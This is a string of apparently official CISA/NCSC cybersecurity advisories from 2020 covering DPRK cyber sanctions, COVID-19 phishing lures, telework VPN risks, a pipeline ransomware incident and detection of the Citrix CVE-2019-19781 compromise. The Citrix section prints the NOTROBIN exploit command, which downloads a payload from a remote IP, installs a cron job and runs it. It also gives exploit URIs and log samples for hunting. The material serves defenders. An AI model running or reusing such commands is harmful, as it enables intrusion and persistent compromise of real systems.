  • Engaged in at least one significant importation from or exportation to North Korea of any goods, services, or technology.

Additionally, if the Secretary of the Treasury, in consultation with the Secretary of State, determines that a foreign financial institution has knowingly conducted or facilitated significant trade with North Korea, or knowingly conducted or facilitated a significant transaction on behalf of a person designated under a North Korea-related Executive Order, or under Executive Order 13382 (Weapons of Mass Destruction Proliferators and Their Supporters) for North Korea-related activity, that institution may, among other potential restrictions, lose the ability to maintain a correspondent or payable-through account in the United States.

OFAC investigates apparent violations of its sanctions regulations and exercises enforcement authority, as outlined in the Economic Sanctions Enforcement Guidelines, 31 C.F.R. part 501, appendix A. Persons who violate the North Korea Sanctions Regulations, 31 C.F.R. part 510, may face civil monetary penalties of up to the greater of the applicable statutory maximum penalty or twice the value of the underlying transaction.

The 2019 POE mid-term report notes the DPRK’s use, and attempted use, of cyber-enabled means to steal funds from banks and digital currency exchanges could violate multiple UN Security Council resolutions (UNSCRs) (i.e., UNSCR 1718 operative paragraph (OP) 8(d); UNSCR 2094, OPs 8 and 11; and UNSCR 2270, OP 32). The DPRK-related UNSCRs also provide various mechanisms for encouraging compliance with DPRK-related sanctions imposed by the UN. For example, the UN Security Council 1718 Committee may impose targeted sanctions (i.e., an asset freeze and, for individuals, a travel ban) on any individual or entity who engages in a business transaction with UN-designated entities or sanctions evasion. 

The Department of Justice criminally prosecutes willful violations of applicable sanctions laws, such as the International Emergency Economic Powers Act, 50 U.S.C. §§ 1701 et seq.  Persons who willfully violate such laws may face up to 20 years of imprisonment, fines of up to $1 million or totaling twice the gross gain, whichever is greater, and forfeiture of all funds involved in such transactions. The Department of Justice also criminally prosecutes willful violations of the Bank Secrecy Act (BSA), 31 U.S.C. §§ 5318 and 5322, which requires financial institutions to, among other things, maintain effective anti-money laundering programs and file certain reports with FinCEN. Persons violating the BSA may face up to 5 years imprisonment, a fine of up to $250,000, and potential forfeiture of property involved in the violations. Where appropriate, the Department of Justice will also criminally prosecute corporations and other entities that violate these statutes. The Department of Justice also works with foreign partners to share evidence in support of each other’s criminal investigations and prosecutions.

Pursuant to 31 U.S. Code § 5318(k), the Secretary of the Treasury or the Attorney General may subpoena a foreign financial institution that maintains a correspondent bank account in the United States for records stored overseas. Where the Secretary of the Treasury or Attorney General provides written notice to a U.S. financial institution that a foreign financial institutions has failed to comply with such a subpoena, the U.S. financial institution must terminate the correspondent banking relationship within ten business days. Failure to do so may subject the U.S. financial institutions to daily civil penalties.

DPRK Rewards for Justice

If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $5 million. For further details, please visit

ANNEX I: USG Public Information on and Resources to Counter the DPRK Cyber Threat

Office of the Director of National Intelligence Annual Worldwide Threat Assessments of the U.S. Intelligence Community.  In 2019, the U.S. Intelligence Community assessed that the DPRK poses a significant cyber threat to financial institutions, remains a cyber espionage threat, and retains the ability to conduct disruptive cyber attacks. The DPRK continues to use cyber capabilities to steal from financial institutions to generate revenue. Pyongyang’s cybercrime operations include attempts to steal more than $1.1 billion from financial institutions across the world – including a successful cyber heist of an estimated $81 million from Bangladesh Bank. The report can be found at—SSCI.pdf.

Cybersecurity and Infrastructure Security Agency (CISA) Technical Reports. The U.S. government refers to the malicious cyber activities by the DPRK as HIDDEN COBRA. HIDDEN COBRA reports provide technical details on the tools and infrastructure used by DPRK cyber actors. These reports enable network defenders to identify and reduce exposure to the DPRK’s malicious cyber activities. CISA’s website contains the latest updates on these persistent threats:

Additionally, CISA provides extensive cybersecurity and infrastructure security knowledge and practices to its stakeholders, shares that knowledge to enable better risk management, and puts it into practice to protect the nation’s critical functions. Below are the links to CISA’s resources:

FBI PIN and FLASH Reports.  FBI Private Industry Notifications (PIN) provide current information that will enhance the private sector’s awareness of a potential cyber threat. FBI Liaison Alert System (FLASH) reports contain critical information collected by the FBI for use by specific private sector partners. They are intended to provide recipients with actionable intelligence that help cybersecurity professionals and system administrators to guard against the persistent malicious actions of cyber criminals. If you identify any suspicious activity within your enterprise or have related information, please contact FBI CYWATCH immediately. For DPRK-related cyber threat PIN or FLASH reports, contact

FBI Legal Attaché Program: The FBI Legal Attaché’s core mission is to establish and maintain liaison with principal law enforcement and security services in designated foreign countries. 

U.S. Cyber Command Malware Information Release. The Department of Defense’s cyber forces actively seek out DPRK malicious cyber activities, including DPRK malware that exploits financial institutions, conducts espionage, and enables  malicious cyber activities against the U.S. and its partners. U.S. Cyber Command periodically releases malware information, identifying vulnerabilities for industry and government to defend their infrastructure and networks against DPRK illicit activities. Malware information to bolster cybersecurity can be found at the following Twitter accounts: @US_CYBERCOM and @CNMF_VirusAlert.

U.S. Department of the Treasury Sanctions Information and Illicit Finance Advisories. The Office of Foreign Assets Control’s (OFAC’s) online Resource Center provides a wealth of information regarding DPRK sanctions and sanctions with respect to malicious cyber-enabled activities, including sanctions advisories, relevant statutes, Executive Orders, rules, and regulations relating to DPRK and cyber-related sanctions. OFAC has also published several frequently asked questions (FAQs) relating to DPRK sanctions, cyber-related sanctions, and digital currency. For questions or concerns related to OFAC sanctions regulations and requirements, please contact OFAC’s Compliance Hotline at 1-800-540-6322 or

Financial Crimes Enforcement Network (FinCEN) has issued an advisory on North Korea’s use of the international financial system ( FinCEN also issued specific advisories to financial institutions with suspicious activity reporting obligations that provide guidance on when and how to report cybercrime and/or digital currency-related criminal activity:

Federal Financial Institutions Examination Council (FFIEC) developed the Cybersecurity Assessment Tool to help financial institutions identify their risks and determine their cybersecurity preparedness. The assessment tool can be found at

ANNEX II: UN Panel of Experts Reports on the DPRK Cyber Threat

UN 1718 Sanctions Committee (DPRK) Panel of Experts Reports. The UN Security Council 1718 Sanctions Committee on the DPRK is supported by a Panel of Experts, who “gather, examine, and analyze information” from UN Member States, relevant UN bodies, and other parties on the implementation of the measures outlined in the UN Security Council Resolutions against North Korea. The Panel also makes recommendations on how to improve sanctions implementation by providing both a Midterm and a Final Report to the 1718 Committee. These reports can be found at



  • April 15, 2020: Initial Version

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Original release date: April 8, 2020


This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).

This alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.

Both CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.

APT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.

Note: this is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.

Technical Details

Summary of Attacks

APT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and “hack-and-leak” operations.

Cybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.

Both APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:

  • Phishing, using the subject of coronavirus or COVID-19 as a lure,
  • Malware distribution, using coronavirus- or COVID-19- themed lures,
  • Registration of new domain names containing wording related to coronavirus or COVID-19, and
  • Attacks against newly—and often rapidly—deployed remote access and teleworking infrastructure.

Malicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:

  • Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware.
    • For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install « CovidLock » ransomware on their device.[1]
  • Open a file (such as an email attachment) that contains malware.
    • For example, email subject lines contain COVID-19-related phrases such as “Coronavirus Update” or “2019-nCov: Coronavirus outbreak in your city (Emergency)”

To create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with “Dr.” in their title. In several examples, actors send phishing emails that contain links to a fake email login page. Other emails purport to be from an organization’s human resources (HR) department and advise the employee to open the attachment.

Malicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as “President discusses budget savings due to coronavirus with Cabinet.rtf.”

Note: a non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.


CISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.

Examples of phishing email subject lines include:

  • 2020 Coronavirus Updates,
  • Coronavirus Updates,
  • 2019-nCov: New confirmed cases in your City, and
  • 2019-nCov: Coronavirus outbreak in your city (Emergency).

These emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.

SMS Phishing

Most phishing attempts come by email but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).

Historically, SMS phishing has often used financial incentivesincluding government payments and rebates (such as a tax rebate)as part of the lure. Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments’ employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. These SMS messages—purporting to be from “COVID” and “UKGOV” (see figure 1)—include a link directly to the phishing site (see figure 2).

Figure 1: UK government-themed SMS phishing


Figure 2: UK government-themed phishing page

As this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.

Phishing for credential theft

A number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.

If the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including—but not limited to—email services provided by Google or Microsoft, or services accessed via government websites.

To further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., “corona-virus-business-update,” “covid19-advisory,” or “cov19esupport”). These spoofed pages are designed to look legitimate or accurately impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.

If the victim enters their password on the spoofed page, the attackers will be able to access the victim’s online accounts, such as their email inbox. This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim’s address book.

Phishing for malware deployment

A number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim’s device.

For example, NCSC has observed various email messages that deploy the “Agent Tesla” keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.

In other campaigns, emails include a Microsoft Excel attachment (e.g., “8651 8-14-18.xls”) or contain URLs linking to a landing page that contains a button that—if clicked—redirects to download an Excel spreadsheet, such as « EMR Letter.xls”. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the “Get2 loader » malware. Get2 loader has been observed loading the “GraceWire” Trojan.

The « TrickBot » malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which—in turn—pulls down the TrickBot binary, executing it on the system.

Figure 3: Email containing malicious macro targeting Italian users[2]

In many cases, Trojans—such as Trickbot or GraceWire—will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[3] Spain,[4] and across Europe[5] have all been recently affected by ransomware incidents.

As always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[6],[7] and NCSC[8] provide guidance on mitigating malware and ransomware attacks.

Exploitation of new teleworking infrastructure

Many organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.

Malicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. Citrix vulnerability, CVE-2019-19781, and its exploitation have been widely reported since early January 2020. Both CISA[9] and NCSC[10] provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability’s exploitation.

Similarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[11] and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[12]

Malicious cyber actors are also seeking to exploit the increased use of popular communications platforms—such as Zoom or Microsoft Teams—by sending phishing emails that include malicious files with names such as “zoom-us-zoom_##########.exe” and “microsoft-teams_V#mu#D_##########.exe” (# representing various digits that have been reported online).[13] CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[14]

The surge in teleworking has also led to an increase in the use of Microsoft’s Remote Desktop Protocol (RDP). Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[15] and recent analysis[16] has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems—without the right security measures in place—more vulnerable to attack.[17]

Indicators of compromise

CISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:

In addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:



Malicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)’s COVID-19 Situation Summary.

Following the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:

Phishing guidance for individuals

The NCSC’s suspicious email guidance explains what to do if you’ve already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC’s top tips for spotting a phishing email:

  • Authority – Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.
  • Urgency – Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.
  • Emotion – Does the message make you panic, fearful, hopeful, or curious? Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.
  • Scarcity – Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.

Phishing guidance for organizations and cybersecurity professionals

Organizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.

In addition to educating users on defending against these attacks, organizations should consider NCSC’s guidance that splits mitigations into four layers, on which to build defenses:

  1. Make it difficult for attackers to reach your users.
  2. Help users identify and report suspected phishing emails (see CISA Tips, Using Caution with Email Attachments and Avoiding Social Engineering and Phishing Scams).
  3. Protect your organization from the effects of undetected phishing emails.
  4. Respond quickly to incidents.

CISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.

Communications platforms guidance for individuals and organizations

Due to COVID-19, an increasing number of individuals and organizations are turning to communications platforms—such as Zoom and Microsoft Teams— for online meetings. In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.

Tips for defending against online meeting hijacking (Source: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic, FBI press release, March 30, 2020):

  • Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.
  • Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.
  • Manage screensharing options. Change screensharing to “Host Only.”
  • Ensure users are using the updated version of remote access/meeting applications.
  • Ensure telework policies address requirements for physical and information security.


This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.

CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA.



  • April 8, 2020: Initial Version

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Original release date: March 13, 2020


As organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or telework—require an enterprise virtual private network (VPN) solution to connect employees to an organization’s information technology (IT) network. As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity.

Technical Details

The following are cybersecurity considerations regarding telework.

  • As organizations use VPNs for telework, more vulnerabilities are being found and targeted by malicious cyber actors.
  • As VPNs are 24/7, organizations are less likely to keep them updated with the latest security updates and patches.
  • Malicious cyber actors may increase phishing emails targeting teleworkers to steal their usernames and passwords.
  • Organizations that do not use multi-factor authentication (MFA) for remote access are more susceptible to phishing attacks.
  • Organizations may have a limited number of VPN connections, after which point no other employee can telework. With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks.


CISA encourages organizations to review the following recommendations when considering alternate workplace options.

  • Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Securing Network Infrastructure Devices.
  • Alert employees to an expected increase in phishing attempts. See CISA Tip Avoiding Social Engineering and Phishing Attacks.
  • Ensure IT security personnel are prepared to ramp up the following remote access cybersecurity tasks: log review, attack detection, and incident response and recovery. Per the National Institute of Standards and Technology (NIST) Special Publication 800-46 v.2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security, these tasks should be documented in the configuration management policy.
  • Implement MFA on all VPN connections to increase security. If MFA is not implemented, require teleworkers to use strong passwords. (See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.)
  • Ensure IT security personnel test VPN limitations to prepare for mass usage and, if possible, implement modifications—such as rate limiting—to prioritize users that will require higher bandwidths.
  • Contact CISA to report incidents, phishing, malware, and other cybersecurity concerns.



  • March 13, 2020: Initial Version

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Original release date: February 18, 2020


Note: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK for Industrial Control Systems (ICS) frameworks for all referenced threat actor techniques and mitigations.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages asset owner operators across all critical infrastructure sectors to review the below threat actor techniques and ensure the corresponding mitigations are applied.

CISA responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network. The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers. Impacted assets were no longer able to read and aggregate real-time operational data reported from low-level OT devices, resulting in a partial Loss of View [T829] for human operators. The attack did not impact any programmable logic controllers (PLCs) and at no point did the victim lose control of operations. Although the victim’s emergency response plan did not specifically consider cyberattacks, the decision was made to implement a deliberate and controlled shutdown to operations. This lasted approximately two days, resulting in a Loss of Productivity and Revenue [T828], after which normal operations resumed. CISA is providing this Alert to help administrators and network defenders protect their organizations against this and similar ransomware attacks.

Technical Details

Network and Assets

  • The victim failed to implement robust segmentation between the IT and OT networks, which allowed the adversary to traverse the IT-OT boundary and disable assets on both networks.
  • The threat actor used commodity ransomware to compromise Windows-based assets on both the IT and OT networks. Assets impacted on the organization’s OT network included HMIs, data historians, and polling servers.
  • Because the attack was limited to Windows-based systems, PLCs responsible for directly reading and manipulating physical processes at the facility were not impacted.
  • The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process.
  • All OT assets directly impacted by the attack were limited to a single geographic facility.

Planning and Operations

  • At no time did the threat actor obtain the ability to control or manipulate operations. The victim took offline the HMIs that read and control operations at the facility. A separate and geographically distinct central control office was able to maintain visibility but was not instrumented for control of operations.
  • The victim’s existing emergency response plan focused on threats to physical safety and not cyber incidents. Although the plan called for a full emergency declaration and immediate shutdown, the victim judged the operational impact of the incident as less severe than those anticipated by the plan and decided to implement limited emergency response measures. These included a four-hour transition from operational to shutdown mode combined with increased physical security.
  • Although the direct operational impact of the cyberattack was limited to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. This resulted in an operational shutdown of the entire pipeline asset lasting approximately two days.
  • Although they considered a range of physical emergency scenarios, the victim’s emergency response plan did not specifically consider the risk posed by cyberattacks. Consequently, emergency response exercises also failed to provide employees with decision-making experience in dealing with cyberattacks.
  • The victim cited gaps in cybersecurity knowledge and the wide range of possible scenarios as reasons for failing to adequately incorporate cybersecurity into emergency response planning.


Asset owner operators across all sectors are encouraged to consider the following mitigations using a risk-based assessment strategy.

Planning and Operational Mitigations

  • Ensure the organization’s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and loss of safety. In particular, response playbooks should identify criteria to distinguish between events requiring deliberate operational shutdown versus low-risk events that allow for operations to continue.
  • Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications. Capture lessons learned in emergency response playbooks.
  • Allow employees to gain decision-making experience via tabletop exercises that incorporate loss of visibility and control scenarios. Capture lessons learned in emergency response playbooks.
  • Identify single points of failure (technical and human) for operational visibility. Develop and test emergency response playbooks to ensure there are redundant channels that allow visibility into operations when one channel is compromised.
  • Implement redundant communication capabilities between geographically separated facilities responsible for the operation of a single pipeline asset. Coordinate planning activities across all such facilities.
  • Recognize the physical risks that cyberattacks pose to safety and integrate cybersecurity into the organization’s safety training program.
  • Ensure the organization’s security program and emergency response plan consider third parties with legitimate need for OT network access, including engineers and vendors.

Technical and Architectural Mitigations

  • Implement and ensure robust Network Segmentation [M1030] between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone (DMZ) that eliminates unregulated communication between the IT and OT networks.
  • Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to Filter Network Traffic [M1037] and monitor communications between zones. Prohibit Industrial Control System (ICS) protocols from traversing the IT network.
  • Require Multi-Factor Authentication [M1032] to remotely access the OT and IT networks from external sources.
  • Implement regular Data Backup [M1053] procedures on both the IT and OT networks. Ensure that backups are regularly tested and isolated from network connections that could enable the spread of ransomware.
  • Ensure user and process accounts are limited through Account Use Policies [M1036], User Account Control [M1052], and Privileged Account Management [M1026]. Organize access rights based on the principles of least privilege and separation of duties.
  • Enable strong spam filters to prevent phishing emails from reaching end users. Implement a User Training [M1017] program to discourage users from visiting malicious websites or opening malicious attachments. Filter emails containing executable files from reaching end users.
  • Filter Network Traffic [M1037] to prohibit ingress and egress communications with known malicious Internet Protocol (IP) addresses. Prevent users from accessing malicious websites using Uniform Resource Locator (URL) blacklists and/or whitelists.
  • Update Software [M1051], including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.
  • Set Antivirus/Antimalware [M1049] programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.  
  • Implement Execution Prevention [M1038] by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
  • Implement Execution Prevention [M1038] via application whitelisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder.
  • Limit Access to Resources over Network [M1035], especially by restricting Remote Desktop Protocol (RDP). If after assessing risks RDP is deemed operationally necessary, restrict the originating sources and require Multi-Factor Authentication [M1032].



  • February 18, 2020: Initial Version

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Original release date: January 31, 2020


Unknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[1]

Though mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.

Compromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.

Contact CISA, or the FBI to report an intrusion or to request assistance.


Technical Details


CISA has developed the following procedures for detecting a CVE-2019-19781 compromise. 

HTTP Access and Error Log Review

Context: Host Hunt

Type: Methodology

The impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in /var/log. Log files httpaccess.log and httperror.log should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.

  • '*/../vpns/*'
  • '*/vpns/cfg/smb.conf'
  • '*/vpns/portal/scripts/*'
  • '*/vpns/portal/scripts/*'
  • '*/vpns/portal/scripts/*'

Note: These URIs were observed in Security Information and Event Management detection content provided by[2]

Per TrustedSec, a sign of successful exploitation would be a POST request to a URI containing /../ or /vpn, followed by a GET request to an XML file. If any exploitation activity exists—attempted or successful—analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak’s blog provided sample logs indicating what a successful attack would look like.[3] - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/ HTTP/1.1" 200 143 "" "USERAGENT " - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"

Additionally, FireEye provided the following grep commands to assist with log review and help to identify suspicious activity.[4]

grep -iE 'POST.*.pl HTTP/1.1" 200 ' /var/log/httpaccess.log -A 1
grep -iE 'GET.*.xml HTTP/1.1" 200' /var/log/httpaccess.log -B 1

Running Processes Review

Context: Host Hunt

Type: Methodology

Reviewing the running processes on a system suspected of compromise for processes running under the nobody user can identify potential backdoors.

ps auxd | grep nobody

Analysts should review the ps output for suspicious entries such as this:

nobody    63390  0.0  0.0  8320    16  ??  I     1:35PM   0:00.00 | | `– sh -c uname & curl -o –

Further pivoting can be completed using the Process ID from the PS output:

lsof -p <pid>

Due to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the httpd process.

Checking for NOTROBIN Presence

Context: Host Hunt

Type: Methodology

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

The above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at /tmp/.init as well as httpd processes running as a cron job.

Running the command find / -name ".init" 2> /tmp/error.log should return the path to the created staging directory while taking all of the errors and creating a file located at /tmp/error.log.

Additional /var/log Review

Context: Host Hunt

Type: Methodology

Analysts should focus on reviewing the following logs in /var/log on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the nobody user or (null) on and should try to identify any suspicious commands that may have been run, such as whoami or curl. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.


Sample Log Entry:

Jan 10 13:35:47
<local7.notice> ns bash[63394]: nobody on /dev/pts/3

Note: The bash log can provide the user (nobody), command (hostname), and process id (63394) related to the nefarious activity.



Check Crontab for Persistence

Context: Host Hunt

Type: Methodology

As with running processes and log entries, any cron jobs created by the user nobody are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a httpd process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:

crontab -l -u nobody

Existence of Unusual Files

Context: Host Hunt

Type: Methodology

Open-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.

  • /netscaler/portal/templates
  • /var/tmp/netscaler/portal/templates

Snort Alerts

Context: Network Alert

Type: Signatures

Although most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye’s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .CONF response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"al]|0d0a|"; distance:0; content:"encrypt passwords"; distance:0; content:"name resolve order"; reference:cve,2019-19781; reference:url,; sid:201919781; rev:1;)
